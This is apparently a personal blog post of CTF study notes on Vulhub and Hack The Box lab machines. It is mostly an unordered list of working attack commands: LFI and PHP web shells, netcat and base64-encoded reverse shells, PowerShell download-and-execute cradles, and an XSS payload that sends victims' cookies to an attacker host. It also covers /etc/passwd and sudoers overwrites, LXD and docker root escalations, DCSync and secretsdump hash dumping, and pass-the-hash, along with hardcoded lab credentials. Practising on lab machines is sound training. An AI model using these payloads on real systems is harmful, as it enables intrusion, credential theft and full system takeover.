Uncategorized

My CTF notes-Vulhub & HTB

Please ignore any typos and grammar mistakes. These are notes from my learning and various assessments. Before I forgot all these, thought to share them here as someone will find them useful. Again note, it’s not so arranged.

Vulhub Machines

Happy corp
1.whenever you find php files in the url , try doing LFI with ‘.php?file=/etc/passwd
2.after that try injecting the php code which will open a cmd in the victim machine with this command- ‘<?php system($_GET[‘cmd’]) ?>’
3.To see wether its working we can append this command- ‘&cmd=id’
What this command does is it will give the uid, guid and all.
4.use tool like wfuzz to fuzz the url
5.look for these files when get LFI “/etc/passwd, /etc/shadow, & /var/log/nginx/access.log, /var/log/nginx/error.log
6.In linux tmp is the only folder where the user have read write access
7.There are a few commands which always run as root, regardless of who executes them. These are called SUID root. Commads to identify processes which run as root.
-find / -perm /4000 2>/dev/null
8.Command to get a shell
-python3 -c “import pty; pty.spawn(‘/bin/bash’)”
9. to do command injection in username and password field
-http://10.0.2.11/admin.php?username=ls & password=test
10.its always good to do reverse-shell because we can cheat firewalls
————–
v1-inclusiveness-1
1.if robots.txt file is not showing the contents inside it , then we should add a custom user-agent into the firefox to bypass this restriction
2.follow this step
#Inside the URL tab search for “about:config”
#Then search for preference Name: useragnet
#Make a right click then > New > String
#create useragent “general.useragent.overriide” with string name as googlebot.
#reloadthe page now.
3. command to find programs running under superuser.
4. #find / -perm -u=s -type f 2>/dev/null
5. #find / -perm -4000 -type f 2>/dev/null
6. adding a directory to path variable. Here we are adding the ‘temp’ directory to the path variable
#export PATH=/tmp:$PATH
#echo path
————–
v2-my-file-server-1
1. smbmap -H 192.168.29.123 . With this command we can identify the sbmusers in that machine .
2. if we can somehow insert a ssh public key into the .ssh directory with name ‘id_rsa.pub’ , then we will be able to get access via ssh. Make sure that
the ssh public key is made with a username that we got through the enumeration.
3. Complining a c exploit
#gcc evil.c -o hack -pthread
————
v3-tempus-fugit
Its a kind of machine where inside the primary machine there is other machines running in the form of docker images and the flag is inside this docker images. We can idenfity this sing the IP address in ifconfig. we will see other range.set of IP address
In ctf challenges always read all the writings and you will get some clue from here and there
1.trying command injection at upload
filename=”test.txt;whoami”
2.when ‘.py’ or ‘.php’ are not read by the server because of the filtering try with the wildcard options. Here we are reading a ‘main.py’ file. Since ‘.py extension is not read we are giving the folowing command
#cat main*
3.bypassing dot extension used inthe IP addresses. Sometimes when we get command injection in the webapplication there are cases where ‘.’ dot is filtered and we will not be able to make a reverse shell as the reverse shell we make will have a IP address with dots. so what we does is we convert the ip to ‘long ip’ there by bypassing the restriction. so the command looks like this
#nc 32893749253917 9999
4.converting netcat reverse shell to base64 encoding to bypass protection
#echo bmMgLW52IDE3Mi4xNi4xODYuMSA3Nzc3IC1lIC9iaW4vc2g= | base64 -d | sh
4. other kind of netcat shell
# nc 34459574061 8888 -e sh
6.converting improper shell to TTY shell
#python -c ‘import pty; pty.spawn(“/bin/sh”)’
#python -c “import pty; pty.spawn(‘/bin/bash’)”
#python -c ‘import pty;pty.spawn(“/bin/bash”)’
7.other kind of FTP- ncftp. An alternative kind of FTP client developed during 1990’s.
8.To identify whether we are inside a docker enviroment just read the proc cgroup file.
#cat/proc/1/cgroup
9.port scanning with netcat
#nc -zv 192.168.10.11 21
10.lftp- other kind of ftp client also called swiss knife in file transfer protocols
11. always look into the hidden(with ‘.’ extension ) and also history files. also files with ‘.history’ extension.
12.finding the flavor of linux
#cat /etc/os-release
https://www.cyberciti.biz/faq/how-to-check-os-version-in-linux-command-line/
13.finding the flavor of linux kernal
#uname -r
14.adding tools in alpine linux
#apk add nmap
15.msfvenom payload for ‘alphine’ llinux should of ‘payload.elf’ format.
16.port forwarding using meterpreter
#portfwdadd -l 8080 -p 8080 -r 172.19.0.1
17.routing victims internal network traffic without using meterpreter
#ip route add 172.19.0.0/24 via 172.16.186.196
17.sometimes if some services are working inside the docker , they may be not accessible to the public attacker. n that case we have to use the portforwading so that we can port forward the service to the attcker machine and see it.
18.finding the dns resolve cachae of a machine
#cat /etc/resolv.conf
#cat /etc/hosts
19.Bind-tools – a set of tools used for checking the DNS implementation
#apk add bind-tools
20.if we are inside a private network and we were able to identify the dns server , then we can try for dns zone transfer.
#dig axfr mofo.pwn
21.finding out processes using netstat
#netstat -ntlp
22.grabbibg credentials from network
#responder -I etho.
a better tool than wireshark
23. to login as a new user
# su kamal
24. checking wether a user can run some applications with root privileges. This will work only if we know the password of the account we are logged in , other wise use the other commands above used.
#sudo -l
————
View2aKill

1.always scan for all the ports
2.always try reading the files inside a directories we get.
3.look for python one liner reverse shell.
4.kali has reverse shells located at /usr/share/webshell
5.website to convert strings to sha1 hashes- http://www.sha1-online.com/
6.this writeup also contains python script to convert strings to sha1 hashes using a python library called ‘hashlib’.
————
mattermost

1.always README.md files
2.always check for udp ports also.
3. Opening a webserver with php
#php -S 0.0.0.0:8080
4. converting ‘hex file’ to string
5. #echo $((0xf447))
————-
connect-the-dots
1.always read the source code of the website.
2.attaching to a nfs share
#showmount-e 10.0.2.17
3.in most cases privileage escalation is done by looking for weak service configuration such as SUDO and SUID permission.use the following command.
# /sbin/getcap -r / 2>/dev/null
4. usually programs with “+ep” permission has the provision to get root privilege. Here in our case the ‘tar’ program has this permission and we are exploiting it.
5. binary files cannot be read with ‘cat’ or ‘nano’ commands. To read those files we can use ‘strings’ command. this command will pullout the human-readable contents of a binary file.
————-
cyNix
1. if there is a website and no other clue even without even having a port open, then there is a chance of getting some clue from the ‘source code’ or else if there is any form there is chance of getting some info from that. IN this type of cases most of the time you will get LFI or command exection if ‘form’ fields.
2. in such kind of above cases check for the ‘opacity’ ration. The opacity-level describes the transparency-level, where 1 is not transparent at all, 0.5 is 50% see-through, and 0 is completely transparent.sometimes clues are hidden using opacity feature.
3. in ‘/etc/apsswd’ file check for user id’s with ‘1000:1000’ permissions.
4. if there is LFI in the website and you have ‘ssh’ open in the same website, then there is a chance of getting the SSH key from the “/home/user/.ssh/id_rsa”. With this key one can login inside the website.
5. this kind ok ‘key’ should be given ‘600’ permission inorder to execute.
#ssh -i key user@10.0.2.1
6. whenever you get a shell always check for wether you are into which group using the below commands
#groups
#id
-people with root user level access are put into a group and given sudo permission. So this is how the sudo command comes into play.
—-Exploitation when you are into LXD group—–
1.LXD is a process that runs on a machine when they have a container or virtualization technology runnning on a linux machine.
2.LXD processes are always root processes and anyone with write access to the LXD UNIX socket.
3. so the concept behind this attack is that the attacker is buidling a docker image in the attacker machine and then transfering the docker image to the victims machine and running the image there. on running the image we will get the privilege to run shell commands in the victims machine.
4. When doing privilege escalations always dump your bin or any whatever executable into the ‘tmp’ directory of the linux machines.
A attacker machine
#git clone https://github.com/saghul/lxd-alpine-builder.git
#cd lxd-alpine-builder
#./build-alpine

at victim machine
#cd /tmp
#wget http://192.168.1.107:8000/apline-v3.10-x86_64 20191008_1227.tar.gz
#lxc image import ./apline-v3.10-x86_64-20191008_1227.tar.gz –alias myimage
#lxc image list
#lxc init myimage ignite -c security.privileged=true
#lxc config device add ignite mydevice disk source=/ path=/mnt/root #recursive=true
#lxc start ignite
#lxc exec ignite /bin/sh
#id

Once the container is up and running, navigate to the following folder to see all the resources.
#cd /mout/root/root
————
v7-DC-9
1. In php website if you get “file does not exit” , that means in the php code there is function called “include()” , and there “include” functions are vulnerable to LFI
2. ../../../../../proc/sched_debug- this will list the current processes in the host machine.
3. port knocking- Port Knocking is a method used to secure your port access from unauthorised users.This allows you to keep your services hidden until you actually plan on using them. Once a correct sequence of connection attempts is received, the firewall will open the port that was previously closed.
4. if you find a firewall with filtered port, always check for the ‘knockd.conf’ file. Then use the correct sequence said in the knockd file.
# apt-get install knockd
#knock 10.0.2.19 7469 8475 9842
Knocking using nmap
# nmap -Pn –host-timeout 201 –max-retries 0 -p 571,290,911 10.10.10.43
# ls -lart
6. This command will open up the ssh port only. Usually in this kind of knocking cases, the ssh Public & Private key will be found somever around by enumerating the target. Mostly in secret folders or Pics;s.
5.the below command will list the ‘commands’ the sudo user have access to.
#sudo-l
6. to see the properties of a file
# ls -lart /etc/bin/attack.py
#file attack.py
7.in order to get root access , there is a method of pushing the ‘username’ and password hash into the /etc/passwd file. for that first we need to create the hashed password using a functionality called ‘crypt’. this can be done using the ‘perl’ or using the openssl.
#perl -le ‘print crypt(“username”, “password”)’
#openssl passwd -1 -salt kamal password
#echo “kamal:aaKNIED0aueR6:0:0::/root:/bin/bash” > /etc/passwd
8. thus the argument is passed into ‘/etc/passwd’ file and we will get the root access.
———–
V8-symfonos
1. In php sites always check the parameters for LFI.
2. if you have got LDAP username and password there is a script in nmap to scan for addtional information
3. #nmap 192.168.0.112 -p 389 –script ldap-search –script-args ‘ldap.username=”cn=admin,dc=symfonos,dc=local”, ldap.password=”qMDdyZh3cT6eeAWD”‘
4. Privilage escalation using DPKG
5. the secret behind the privilege escalation lies in the concept of ” finding improper sudo permissions”.
-command to check the super user permision of the commands the user who is logged in
#sudo -l
-here in this machines case the admin has given the user to use the dpkg command in root user mode.
-so what the user is doing is that he is creating a ‘.deb’ package with a malicious code inside and executing it with dpkg.
-here a linux ‘package’ named fpm is used.
#nano shell.sh –> /bin/bash
#fpm -s dir -t deb -n exploit –before-install shell.sh ./
-Now transfer it to the client side and execute it
#sudo -u root /usr/bin/dpkg -i exploit_1.0_amd64.deb
10. decoding the Base64 code with echo
#echo Y2V0a0tmNHdDdUhDOUZFVA== | base64 -d
———–
v9-sunrise
1.in ‘/etc/passwd’ file if there is names with ‘1000:1000″ permisions, then its a user. here in this case its ‘sunrise’ and ‘weborf’
2. So there will be always two directories in the machines with these two names and they might have secret files in it. It will be always found in ‘/home’ directory
#/home/sunrise or /home/weborf
3. searching for vulnerability using ‘searchsploit’
#searchsploit webrof 0.1.2
#searchsploit -m 14925
4.Mysql commands
#Show databases;
#use mysql; —-> show tables; —-> describe user; —–> select user,password from user;
———–
v10-Sar walkthrough
1. Always check the ‘robots.txt’ file for hidden directories.
2. when there is code execution in the url make use of “web delivery” metasploit exploits.
3. curl command to send a shell into a webserver and execute it
#curl http://192.168.86.99/shell.txt –output shell.php
-Here the ‘shell.txt’ contains the php code and using the ‘output’ parameter it will be saved in the webserver as ‘shell.php’.
4.using echo command to add the normal user to the ‘sudoers’ file.
#echo “www-data ALL= (root) NOPASSWD: /usr/bin/sudo ” >>/etc/sudoers
5.If you dont have the normal privilage to run ‘wget’ or any commands in the normal dictories, run running it in the ‘/tmp’ directory. ‘/tmp’ directories usually have the privileges to run root commands.
————
v11- Five86-1
1.when exploit modules downloaded from the exploit.db are metasploit module i.e ‘.rb’ files, then it should be coppied into the following directory.
# /exploit
2.creating a 10 letter password with a limited charateters using crunch. Here ‘abcdefg’ is the limited characters.
#crunch 10 10 abcdefg > dict.txt
3.using John to crack a hash
#john –wordlist=/root/dict.txt hash
4. the authorized keys are by default configured in .ssh/authorized_keys in the user’s home directory.
5. basic tutorial on creating ssh public and private key- https://www.digitalocean.com/community/tutorials/how-to-configure-ssh-key-based-authentication-on-a-linux-server
6. checking for directories with SUID enabled permissions-
#find / -perm -u=s -type f 2>/dev/nul
#find / -perm -4000 -type f
7.searching directories for a specific name
#find / -name *mail* -user jen
————
v12- Sunset
1.if we are able to get sql injection , then we can inject malicious php code into any directory inside the webserver we like.
#mysql> select “<?php system($_GET[‘cmd’]); ?>” into outfile ‘/var/tmp/raj.php’ ;
using sql for code execution- https://www.mrjamiebowman.com/hacking/command-line-mysql-for-hackers/
2. url to execute command execution
# http://192.168.1.167:8080/raj.php?cmd=payload
3.generating web delivery php shell codes
msfconsole>>use exploit/multi/script/web_delivery>>set target 1 (for php reverse shell)>>set payload php/meterpreter/reverse_tcp>>set lhost eth0 (for ethernet card)>>set lport 1122>>run
4.Making use of ‘make’ command for privelege escalation
#COMMAND=’/bin/sh’
#sudo -u make -s –eval=$’x:\n\t-‘”$COMMAND”
– https://gtfobins.github.io/gtfobins/make/
5.Making use of docker to generate a container and there after gaining root shell.
#docker run -it -v /root:/root ubuntu
#docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
#docker run -v /:/mnt — rm -it alpine chroot /mnt sh
————
v-13-sunset:nightfall
1.method of accessing a machine by generating ssh public key and private key.usually what is done is , a ssh keys are generated using ssh-keygen and copied into the ‘.ssh’ directory of the respective machines
2.’id_rsa.pub’ is put into the victim machine and we use our private key- ‘id_rsa’ to ssh into the victim machine
2.There after the they are converted to ‘authorized_keys’.
#cat ~/.ssh/id_rsa.pub > authorized_keys
or
#cp id_rsa.pub authorized_keys
3. there after ssh into the victim machine
#ssh kamal@10.0.2.17 -i id_rsa
4.command execution using find command
#./find . -exec /bin/sh -p \; -quit
5.Finding binaries using sudo permission using ‘linux smart enumeration’
#https://github.com/diego-treitos/linux-smart-enumeration
————
v-14 dawn
1.when smb ports are open use ‘enu4linux’ to enumerate.
2. connecting to a smb share
#smbclient //192.168.1.165/ITDEPT
3.putting a file into smb share
#put test.txt
4.netcat command to execute a shell by opening a port in the machine
#nc -e /bin/bash -lvp 1235 &
5. in some cases u will get the root permission even without being a root user. so in that case change the directory to the root, and you will find the flag.

~~~~~~~~~Windows Machines~~~~~~~~~~~~~~~~~~~~~~~~~
General Tips—————————————–
1.If there are no Hot fixes then its likely the system is vulnerable to kernel exploit
2. use rlwrap to improve windows shell
# rlwrap nc -lnvp 443
3.check for the permissions of the folder which have write access by creating some text document.
#echo test > test.txt

Blue————————————————————-
1.adding a new user through command line if we get a admin level shell
#net user hacker hacker /add
2. adding the above added user to the administrator group
# net localgroup /add administrators hacker
3.to enable the RDP add the following regitry key
# reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
#for getting reverse shell in windows server we must either made reverse-shells of aspx or jsp format.

Devel————————————————————————-
1.starting a smb server for file transfer using the “smbserver.py” from impacket module. here ‘root’ is the name of directory shared. this is done at kali side
#smbserver.py share root
#smbserver.py kali .
2.at other end, windows comand-line the following command is used to donwload the file
# copy \\10.10.10.14\kali\myshell.exe .
or
# copy \\10.10.10.14\kali\myshell.exe exploit.exe
2. using the windows share functionality to run an exe file directly using the command line
# \\10.10.14.34\share\nc.exe -e cmd.exe 10.10.14.34 443
Here \\10.10.14.34\share\nc.exe is the file that we hosted using smbserver.py, which will use cmd to make connection with our kali machine(10.10.14.34) listening on 443.
3.once u get the initial shell use the following command to check for different options- systeminfo, net users, hostname and hotfixes.
4.In ‘systeminfo’ check for three things- os version, system type, processor type.So depending on the system type(32 or 64) we need to build the exploit.
5.checking for .net version installed
# reg query “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP” reg query “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP”
#\windows\microsoft.net\framework\v2.0.50727\msbuild -version
6.checking for Privescalation- Here like linenum.sh, watson is a script which can check for privsesec vectors in windows.
7.powershell one-liner to download files and execute it
# Powershell iex(new-object net.webclient).downloadString(‘http://10.10.10.1:8000/exploit.ps1’)
powershell one-liner to download files
#powershell -c “(new-object System.Net.WebClient).DownloadFile(‘http://10.10.14.30:9005/40564.exe’, ‘c:\Users\Public\Downloads\40564.exe’)”
8.compiling a kernal exploit
# i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
9.dowloading files using powershell . Three methods
– powershell -ExecutionPolicy Bypass -File wget.ps1 http://10.10.14.6:9000/priv.exe priv.exe
– powershell wget “http://10.10.14.27//sherlock/Sherlock.ps1”
– powershell wget “http://10.10.14.27/41020.exe” -outfile “exploit.exe”
10. windows exploit suggestor(wes) usage
-first update the wes .
-This creates an excel spreadsheet form the Microsoft vulnerability database in the working directory.
-Secondly, The next step is to retrieve the system information from the target machine. This can be done using the “systeminfo” command.
-Thirdly, Copy the output and save it in a text file “sysinfo.txt” in the Windows Exploit Suggester directory on the attack machine.
-final command looks like this
#./windows-exploit-suggester.py –database 2019-10-05-mssb.xls –systeminfo sysinfo.txt

Bastard————————————————————————
1.drupal cms scanner
# droopescan scan drupal -u http://10.10.10.9
2. directory searching using
dirsearch.py -u http://10.10.10.9/ -e php -x 403,404 -t 50
3.getting shell execution on victim machines using three methods
– using powershell
– using smbserver
– certutils
4.using netcat to get a shell while using the browser
#\\10.10.14.14\share\nc64.exe%20-e%20cmd.exe%2010.10.14.14%20443
5. checking architecture of a system using command line
# wmic os get OSarchitecture
6.Downloading files in windows using ‘certutil.exe’.
#certutil.exe -urlcache -split -f http://10.10.10.9/exploit.exe C:\temp\evil.exe

Granny———————————————————-
1.exploiting put method
https://medium.com/@asfiyashaikh10/exploiting-put-method-d2d0cd7ba662

Multiple Ways to Exploiting PUT Method


https://www.arridae.com/blogs/HTTP-PUT-method.php
1.checking for HTTP method vulnerabilitiies
# davtest –url http://10.10.10.15
2.adding a user to administrative group
# net user test test /add && net localgroup Administrators test /add
3.checking the properties of newly created user
# net user test
4.switch to a new user
# runas kamal
5. cadaver also used to check for http-methods vulnerability.
6. check for the ‘SeImpersonatePrivilege’ status using the command below. enablining this gives for a vulnerability called “Token HIjacking”.
# whoami /priv

Arctic————————————————————————–
1. searchsploit command to check for EDB database id
# searchsploit –id adobe coldfusion
2.making jsp reverse shell for windows platforms
# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 > shell.jsp
3.command to use instead of ‘type’ in windows
# more user.txt

Grandpa————————————————————
1. check for permissions of a folder. If the shows result as ‘wd’, means write data, then we can download files into this directory.
# icacls temp
2. check privileges of current shell
# whoami /priv
3. In metasploit use ” local exploit suggester” to check for privesc using metasploit modules.
4. Adding a line to the end of a file. when it comes to the powershell nishangs script, we need to add a line to the end of the file which basically shows the reverse-shell connection address.
# Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 6666
# tail -1 Invoke-PowerShellTcp.ps1
5. looking for specific information on systeminfo
# systeminfo | findstr /B /C:”OS Name” /C:”OS Version”

Silo————————————————————–
This is a box that mainly deals with the exploitation of the oracle database and uses a specific tool called Oracle Database attacking tool(ODAT).
1.First download odat binary from the github
2. Attacking oracle DBMS starts by enumerating the Oracle System ID and there after bruteforcing the crendentials associated with each SID.
3. Both of this can be done with the help of metasploit modules or ODAT tool.
#odat_x64 sidguesser -s 10.10.10.82 -p 1521
#odat_x64 passwordguesser -s 10.10.10.82 -p 1521 -d XE –accounts-file accounts/oracle_default_userpass.txt
4. In the exploitation phase we are uploading a reverse-shell with odat.
# odat utlfile -s 10.10.10.82 -p 1521 -U “scott” -P “tiger” -d XE –putFile /temp shell.exe ../../shell.exe –sysdba
5. In ODAT there are lot of modules to do the attack. ‘utlfile’ helps to upload a file, similary ‘externaltable’ module helps to execute the malicious file inside the database.
# odat externaltable -s 10.10.10.82 -p 1521 -U “scott” -P “tiger” -d XE –exec /temp shell.exe –sysdba
6.Usually database services runs with system privileges.
7.Tool check for dumping passwords ffrom memory
#volatility
https://0xdf.gitlab.io/2018/08/04/htb-silo.html
8.pass the hash using psexec
#psexec.py -hashes aad3b435b51404eeaad3b43 -target-ip 10.10.10.82 administrator@10.10.10.82
9. Check for services running and its privileges
# tasklist /v
10.if “SeImpersonatePrivilege is Enabled” then we can use ‘rotten potato’ exploit.
#https://areyou1or0.blogspot.com/2019/06/rotten-potato-privilege-escalation-by.html

Bounty————————————————————-
1. making a powershell reverse-shell using msfvenom
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=445 -f psh -o www/met-445.ps1
2. asp reverse-shell code
# <%
Set rs = CreateObject(“WScript.Shell”)
Set cmd = rs.Exec(“cmd /c powershell -c iex(new-object net.webclient).downloadstring(‘http://10.10.14.7:5555/shell.ps1’)”)
o = cmd.StdOut.Readall()
Response.write(o)
%>
3. RCE by uploading web.config file in windows server
# https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/
3.when doing windows exploitation, after getting the initail shell always check for the privelege of the current user by giving the following command
#whoami /priv
4. reading hidden directories and files
#dir /a:hd C:\folder\
#dir /a:hd C:\folder\

conceal———————————————————
1.always download ur priesc executable to your user download directory, i.e
2.if port 500 open means secure vpn tunnel is open, used by IKE.
3.port 161 used by snmp, so quering it by snmpwalk using default “public” community string
#snmpwalk -c public -v 1 10.10.10.116
#snmpwalk -v 2c -c public 10.10.10.116
4.when connecting using ipsec, it requires chnages in its two of the configuration files:- /etc/ipsec.secrets & /etc/ipsec.conf
5.always make sure to run syn scan and tcp-connect scan. Both can give fruitful results.
6.If port 500 is open or if any service is showing IKE service , then we can use the below tool to scan to learn more about ike service.
#ike-scan 10.01.0.12
7. to establish a IPSEC connection strongswan can be used.
# ipsec start
# ipsec up conceal
8.asp reverse shell can be found here in htb writeup
9.creating a bat file using command line cmd.exe
#echo powershell -c iex(new-object net.webclient).downloadstring(‘http://10.10.14.7:5555/shell-2.ps1’) > shell.bat
10. bat reverse shell using net cat
# echo C:\nc.exe -e cmd.exe 10.10.xx.xx 1340 > rev.bat
11. Jucy potato command format
12. https://github.com/ohpe/juicy-potato/releases
juicypotato.exe -p rev.bat -l 9999 -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
12. to get cslid use this script
https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1

Chatterbox————————————————————
1checking of privieleg
-windows exploit suggestor
-watson
-powershell powerup.ps1
-winpeas.exe
2.extracting autologon credentials from memory
#(Get-ItemProperty -Path “HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” -Name DefaultUserName -ErrorAction SilentlyContinue).DefaultUserName
Alfred
#(Get-ItemProperty -Path “HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” -Name DefaultPassword -ErrorAction SilentlyContinue).DefaultPassword
Welcome1!
3. dealing with immediate session death or timeouts
# cat automigrate.rc
# msf exploit(multi/handler) > set AutoRunScript multi_console_command -r /root/automigrate.rc
4. Examining the file with the icacls permission utility,
# icacls root.txt
5. The dir command’s /q switch will show ownership information (“q” for “ownership”…makes sense, no?) about every file and directory in the output listing
#dir /q /a:
6. Using icacls with the /grant switch to give my account full access to the file:
# icacls root.txt /grant alfred:(F)

Forest————————————————-
1.if kerberos and ldap services are running, then its a windows server machines.
2.LDAP can be quered through SMB tools
3.The WSMan and WinRM services are open. If we find credentials through SMB or LDAP, we can use these services to remotely connect to those boxs.
4.LDAp enumeration can be done through nmap ‘ldap-search.nse’ script.
5.enum4linux can be used to query ldap information also.
6.if kerboros pre-authenication is dsabled on any user accounts then we can use kerboresting to get the user hashes, and then use another attack method called pass the hash to login into the device.
7.exploiting winrm service to log in a machine
#evil-winrm -i 10.10.10.161 -u svc-alfresco -p ‘s3rvice’
5.if machines we are exploiting are windows server machines, then its wise to use bloodhound to do a better enumeration
6.creating a user on a domain
#net user rana password /add /domain
7. adding a user to a particular group
# net group “group name” /add rana
8.giving the user a DCsync privileges. This is done by using the powerview.ps1 script by adding a line to it.
#Add-DomainObjectAcl -Credential $cred -TargetIdentity “DC=htb,DC=local” -PrincipalIdentity rana -Rights DCSync
9. use the secretsdump Impacket script to dump the password hashes of all the users on the domain
#impacket-secretsdump htb.local/rana:password@10.10.10.161
10. Misconfigured AD domain object permissions can be found out using the bloodhound script.
11. Impacket script GetNPUsers.py is used to collect the non-preauth AS_REP responses from the KDC.
12. in server cases always check for SMB null session authentication and also Kerberos pre-authentication disabled setting. thses are initial entry points.
13. port 5985 used by WinRM service
14. enumerating the smb ports 445 will give us the shares associated with that machines.
# smbmap -H 10.10.10.161 -u 0xdf -p 0xdf
or
# smbclient -N -L //10.10.10.161
14.enumerating RPC over the port 445
#rpcclient -U “” -N 10.10.10.161

Password Spraying & Other Fun with RPCCLIENT


15.I can get a list of users with enumdomusers
# rpcclient $> enumdomusers
17. I can list the groups as well:
# rpcclient $> enumdomgroups
18. looking at a group for members. Read the above blackhills document for more info.
#querygroup 0x200
19.copy files from windows to kali using smbserver.py
-in kali side
# smbserver.py share . -smb2support -username df -password df
– in Windows side
# net use \\10.10.14.6\share /u:df df
# copy 20191018035324_BloodHound.zip \\10.10.14.6\share\
-deleting the share
# net use /d \\10.10.14.6\share
20.Bloodhound attack can be automated with a tool called aclpwn.
Aclpwn.py is a tool that interacts with BloodHound to identify and exploit ACL based privilege escalation paths.
21. To start aclpwn you have to first start neo4j console then you can use it and I usually have to specify the db credentials.
# aclpwn -du neo4j -dp neo4j1 -f svc-alfresco -ft user -d htb.local -s 10.10.10.12
Then run the aclpwn tool
# aclpwn -f svc-alfresco -t htb.local –domain htb.local –server 10.10.10.161

secnotes———————————–
1. connecting to smb shares in windows from kali
# smbmap -H 10.10.10.97 -u tyler -p ’92g!mA8BGjOirkL%OG*&’
2.putting a shell into the machine using smb
# smbclient -U ‘username%password’ //10.10.10.97/new-site -c ‘put /opt/shells/php/cmd.php 0xdf.php’
3.invoking a shell using netcat nc
# curl “http://10.10.10.97:8808/0xdf.php?cmd=nc.exe+-e+cmd.exe+10.10.14.15+443”
4.if directory is getting cleared or cleaned u can use the script here by oxfd to get the shell back
5.looking for a particular file uisng a windows command shell
# where /R c:\ bash.exe
6.If you are linux always look for ‘.bash_history’. This can sometimes reveal critical information.
7.connecting to a share in the local host from command line
# net use \\127.0.0.1\c$ /user:administrator “u6!4ZwgwOM#^OBf#Nwnh”
8.If you have the user credentials of a user then you can connect to the system using winexe (or psexec.py).
# winexe -U ‘.\administrator%u6!4ZwgwOM#^OBf#Nwnh’ //10.10.10.97 cmd.exe
9.logging into a share using the smbclient
#smbclient //10.10.10.19/new-site -U “tyler”
10. php reverse-shell for windows
# <?php
system(‘nc.exe -e cmd.exe 10.10.xx.xx 1337’)
?>
11. Looking for a specific file using command line
# dir *.exe /b/s | findstr bash
12. javascript payload to collect cookie of other user
# <script>document.write(‘<img src=”http://10.10.14.23:80/collect.gif?cookie=’ + document.cookie + ‘” />’)</script>
13.

—————————-self practice————————-
Bastion
1. THis machine have a backup of the image file. We need to mount to this backup of the image file and then get the username and password.
#https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25
2.mounting a remote share from kali
#mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
#mount -t cifs //10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC /mnt/L4mpje-PC/ -o user=anonymous
4. In linux always mount a remote share to local machines ‘/mnt’ directory.
5. I’ll list all the files in the share:
# find /mnt/ -type f
4.Mounting a ‘.vhd’ file.
-mounting with guestmount
#guestmount –add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd –inspector –ro /mnt2/
-mounting with qemu
#qemu-nbd -r -c /dev/nbd0 “/mnt/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-al7c-806e6f6e6963.vhd”
# mount -r /dev/nbdOpl /mnt/vhd

Buff———————————————
1.changing directory in windows. here we will use ‘dir’ command instead of ‘cd’ command to see the directory contents directly.
# dir C:\users\kamal\desktop
2. to get a better shell in windows always use a netcat to get reverse_shell which gives better shell.
3. Building chisel executable.
#git clone https://github.com/jpillora/chisel.git
#cd chisel
-sync go vendor modules, seems to be needed to build for windows
#go mod vendor
-build Windows binary
#env GOOS=windows GOARCH=amd64 go build -o chisel-x64.exe -ldflags “-s -w”
-build Linux binary:
#go build -ldflags “-s -w”
https://medium.com/@vegardw/reverse-socks-proxy-using-chisel-the-easy-way-48a78df92f29
5.chisel configuration
Chisel Server
#./chisel server -p 2222 –reverse
Chisel Client
#chisel64.exe client 10.10.14.8:2222 R:8888:localhost:8888
6.Finding running service
#netstat -ano | findstr -i listen
#netstat -ano | findstr TCP | findstr “:0″
3.Running smbserver with username and password in new smbserver 2.0
#smbserver.py share . -smb2support -username df -password df
Mapping a share in windows
#net use \\10.10.14.20\s /u:df df

servmon———————————–
1.directory listing using curl command
#curl http://10.129.29.110/../../../../../../../../../../../../users/Nathan/Desktop/Password.txt –path-as-is
# ‘–path-as-is’ option is to make sure that the doted part doesnt get removed.
2.ssh port forwarding
# ssh -L 8443:127.0.0.1:8443 -N Nadine@10.129.29.110
3. creating malicious bat file
# ” @echo off
c:\temp\nc.exe 10.10.10.2 1234 -e cmd.exe”
3. transfer files using super copy
#scp nc.exe Nadine@10.10.10.184:\\Temp\\46802\\nc.exe

~~~~~~~~~~~~Linux Machines~~~~~~~~~~~~~~~~~~~~~~~~~~
BrainFuck———————————-
1. In three cases you should add domain names to the ‘/etc/host’ list.
– if port 443 is open and if the ssl certificate is showing any domain names.
– In nmap scan if DNS is showing any domain names, it should also be added to the host file.
2.if smtp username and password is known, we can login using the telnet.
#. telnet 10.10.10.17 110
3.then use the following syntax to give username and password.
#user kali
#pass toor
4. for retrieving the emails using commandline , use the following command.
#retr1
5. for retrieving a second mail , use the following command
#retr 2

Shocker————————————————————–
1.if you have got ‘cgi-bin ‘ directory found , check for ‘user.sh’ file.
# dirb http://10.10.10.56/cgi-bin -X .sh
or use gobuster to check for specific directories.
# gobuster -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt -t 30 -x .php,.sh,.html
3.one liner for shellshock vulnerability
# curl -H “user-agent: () { :; }; echo; echo; /bin/bash -c ‘cat /etc/passwd’ ” \
http://10.10.10.56/cgi-bin/user.sh
or use metasploit module.
4. when doing privilege escalation use this webite
https://gtfobins.github.io/#
5.in pri-esc if you are given any language root permission, then we can use that language to get reverse-shell. here i am showing exable of perl
#sudo perl –e ‘exec “/bin/sh”‘
6. or use perl reverse shell.

Bashed—————————————————
1.php one-liner payload with msfvenom
# msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.28 lport=4444 -f raw
#gcc test.c -o test

Nibbles————————————————————-
1. if you find a website is made by PHP, its always better to do a dir search and look for interesting files.
